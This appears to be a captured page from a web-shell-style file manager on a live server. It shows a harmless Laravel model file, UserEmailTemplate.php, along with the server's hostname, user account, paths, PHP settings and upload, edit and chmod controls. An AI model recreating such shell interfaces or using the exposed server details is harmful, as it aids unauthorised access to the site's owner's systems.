Server : Apache
System : Linux d13078.sgp1.stableserver.net 5.14.0-611.13.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Dec 11 04:57:59 EST 2025 x86_64
User : ssa2port ( 1003)
PHP Version : 8.1.34
Disable Function : NONE
Directory :  /home/ssa2port/accounts.trinityturbo.com/app/Models/

📁 Create New:
⬆️ Upload File:
Current Dir [ Writable ] Root [ Writable ]


OR Upload from URL:
URL: Save as:

📄 File: UserEmailTemplate.php

Path: /home/ssa2port/accounts.trinityturbo.com/app/Models/UserEmailTemplate.php

Size: 266 B

Permissions: 0664

<?php

namespace App\Models;

use Illuminate\Database\Eloquent\Factories\HasFactory;
use Illuminate\Database\Eloquent\Model;

class UserEmailTemplate extends Model
{
    protected $fillable = [
        'template_id',
        'user_id',
        'is_active',
    ];
}

← Back to Directory Edit File 🔒 Chmod

WP File Manager